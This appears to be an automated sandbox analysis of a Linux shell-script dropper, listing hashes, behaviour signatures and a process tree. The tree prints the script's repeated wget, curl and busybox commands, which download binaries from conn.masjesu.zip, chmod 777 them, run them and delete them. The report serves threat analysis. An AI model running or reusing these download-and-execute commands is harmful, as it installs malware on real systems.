Analysis
-
max time kernel
89s -
max time network
90s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
18/10/2024, 01:45
Static task
static1
Behavioral task
behavioral1
Sample
560efa949c2ce7044d49ee3d9ebff848ccb3033122d20bbcaa0b7399e9246636.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
560efa949c2ce7044d49ee3d9ebff848ccb3033122d20bbcaa0b7399e9246636.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
560efa949c2ce7044d49ee3d9ebff848ccb3033122d20bbcaa0b7399e9246636.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
560efa949c2ce7044d49ee3d9ebff848ccb3033122d20bbcaa0b7399e9246636.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
560efa949c2ce7044d49ee3d9ebff848ccb3033122d20bbcaa0b7399e9246636.sh
-
Size
10KB
-
MD5
5183361c5678acdafd884d6ab53c5cd3
-
SHA1
24931be3d6b09041e74733c300c5fff2fd1714cb
-
SHA256
560efa949c2ce7044d49ee3d9ebff848ccb3033122d20bbcaa0b7399e9246636
-
SHA512
e10b5163432526917e95ecc2860b6633c7cb43604f74f11e6fe404991990513f1d1e22e343e5c16d1e974a5d969f1c061ed51f5d447ed54e5eebdce17acfea4e
-
SSDEEP
192:eqWD4AJOtV9ABt4rzkmAS7/uFt0PBt4rzAZ7/uFtIMqWD4A05:eqWD4AJOtV98mAoGqWD4A05
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 880 chmod 890 chmod 939 chmod 1016 chmod 1009 chmod 773 chmod 925 chmod 897 chmod 904 chmod 918 chmod 988 chmod 932 chmod 946 chmod 828 chmod 837 chmod 868 chmod 1002 chmod 953 chmod 981 chmod 995 chmod 911 chmod 974 chmod 1023 chmod 755 chmod 762 chmod 807 chmod 960 chmod 967 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV 756 OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV /tmp/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB 763 d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB /tmp/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb 774 2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb /tmp/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU 809 zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU /tmp/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj 829 TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj /tmp/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo 839 S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo /tmp/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq 870 q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq /tmp/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET 881 FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET /tmp/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm 891 J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm /tmp/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq 898 OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq /tmp/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC 905 LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC /tmp/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ 912 qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ /tmp/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW 919 7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW /tmp/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd 926 e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd /tmp/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET 933 FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET /tmp/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm 940 J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm /tmp/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq 947 OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq /tmp/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC 954 LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC /tmp/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo 961 S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo /tmp/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq 968 q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq /tmp/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ 975 qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ /tmp/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW 982 7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW /tmp/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd 989 e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd /tmp/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV 996 OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV /tmp/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB 1003 d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB /tmp/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb 1010 2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb /tmp/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU 1017 zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU /tmp/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj 1024 TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 959 busybox 971 curl 980 busybox 991 wget 1013 curl 745 curl 759 curl 924 busybox 999 curl 907 wget 970 wget 978 curl 943 curl 952 busybox 964 curl 985 curl 987 busybox 766 curl 887 curl 894 curl 910 busybox 936 curl 984 wget 1006 curl 1019 wget 833 curl 889 busybox 896 busybox 877 curl 938 busybox 963 wget 922 curl 843 wget 883 wget 903 busybox 803 busybox 914 wget 957 curl 950 curl 956 wget 994 busybox 874 wget 900 wget 931 busybox 942 wget 998 wget 1012 wget 1020 curl 753 busybox 827 busybox 917 busybox 770 busybox 779 wget 893 wget 928 wget 966 busybox 973 busybox 765 wget 835 busybox 879 busybox 862 busybox 908 curl 1022 busybox 935 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb curl File opened for modification /tmp/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq curl File opened for modification /tmp/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb curl File opened for modification /tmp/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB curl File opened for modification /tmp/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm curl File opened for modification /tmp/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW curl File opened for modification /tmp/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo curl File opened for modification /tmp/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW curl File opened for modification /tmp/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd curl File opened for modification /tmp/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj curl File opened for modification /tmp/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq curl File opened for modification /tmp/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET curl File opened for modification /tmp/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ curl File opened for modification /tmp/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV curl File opened for modification /tmp/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC curl File opened for modification /tmp/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC curl File opened for modification /tmp/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj curl File opened for modification /tmp/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU curl File opened for modification /tmp/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ curl File opened for modification /tmp/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB curl File opened for modification /tmp/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET curl File opened for modification /tmp/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq curl File opened for modification /tmp/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo curl File opened for modification /tmp/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd curl File opened for modification /tmp/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq curl File opened for modification /tmp/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm curl File opened for modification /tmp/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV curl File opened for modification /tmp/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU curl
Processes
-
/tmp/560efa949c2ce7044d49ee3d9ebff848ccb3033122d20bbcaa0b7399e9246636.sh/tmp/560efa949c2ce7044d49ee3d9ebff848ccb3033122d20bbcaa0b7399e9246636.sh1⤵PID:722
-
/bin/rm/bin/rm bins.sh2⤵PID:725
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵PID:727
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵
- System Network Configuration Discovery
PID:753
-
-
/bin/chmodchmod 777 OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵
- File and Directory Permissions Modification
PID:755
-
-
/tmp/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV./OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵
- Executes dropped EXE
PID:756
-
-
/bin/rmrm OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵PID:757
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵PID:758
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:759
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵PID:761
-
-
/bin/chmodchmod 777 d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵
- File and Directory Permissions Modification
PID:762
-
-
/tmp/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB./d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵
- Executes dropped EXE
PID:763
-
-
/bin/rmrm d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵PID:764
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵
- System Network Configuration Discovery
PID:765
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:766
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵
- System Network Configuration Discovery
PID:770
-
-
/bin/chmodchmod 777 2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵
- File and Directory Permissions Modification
PID:773
-
-
/tmp/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb./2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵
- Executes dropped EXE
PID:774
-
-
/bin/rmrm 2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵PID:777
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵
- System Network Configuration Discovery
PID:779
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:791
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵
- System Network Configuration Discovery
PID:803
-
-
/bin/chmodchmod 777 zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU./zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵
- Executes dropped EXE
PID:809
-
-
/bin/rmrm zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵PID:812
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵PID:813
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵
- System Network Configuration Discovery
PID:827
-
-
/bin/chmodchmod 777 TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj./TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵
- Executes dropped EXE
PID:829
-
-
/bin/rmrm TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵PID:831
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵PID:832
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:833
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵
- System Network Configuration Discovery
PID:835
-
-
/bin/chmodchmod 777 S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵
- File and Directory Permissions Modification
PID:837
-
-
/tmp/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo./S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵
- Executes dropped EXE
PID:839
-
-
/bin/rmrm S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵PID:842
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵
- System Network Configuration Discovery
PID:843
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵
- System Network Configuration Discovery
PID:862
-
-
/bin/chmodchmod 777 q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq./q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵PID:873
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵
- System Network Configuration Discovery
PID:874
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵
- System Network Configuration Discovery
PID:879
-
-
/bin/chmodchmod 777 FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET./FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵PID:882
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵
- System Network Configuration Discovery
PID:883
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵
- System Network Configuration Discovery
PID:889
-
-
/bin/chmodchmod 777 J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm./J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵PID:892
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵
- System Network Configuration Discovery
PID:893
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵
- System Network Configuration Discovery
PID:896
-
-
/bin/chmodchmod 777 OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq./OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵PID:899
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵
- System Network Configuration Discovery
PID:900
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵
- System Network Configuration Discovery
PID:903
-
-
/bin/chmodchmod 777 LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC./LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵PID:906
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵
- System Network Configuration Discovery
PID:907
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵
- System Network Configuration Discovery
PID:910
-
-
/bin/chmodchmod 777 qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ./qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵PID:913
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵
- System Network Configuration Discovery
PID:914
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵
- System Network Configuration Discovery
PID:917
-
-
/bin/chmodchmod 777 7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW./7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm 7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵PID:920
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵PID:921
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵
- System Network Configuration Discovery
PID:924
-
-
/bin/chmodchmod 777 e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd./e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵PID:927
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵
- System Network Configuration Discovery
PID:928
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵
- System Network Configuration Discovery
PID:931
-
-
/bin/chmodchmod 777 FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET./FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵PID:934
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵
- System Network Configuration Discovery
PID:935
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵
- System Network Configuration Discovery
PID:938
-
-
/bin/chmodchmod 777 J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm./J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵PID:941
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵
- System Network Configuration Discovery
PID:942
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵PID:945
-
-
/bin/chmodchmod 777 OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq./OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵PID:948
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵PID:949
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵
- System Network Configuration Discovery
PID:952
-
-
/bin/chmodchmod 777 LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC./LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵PID:955
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵
- System Network Configuration Discovery
PID:956
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:957
-
-
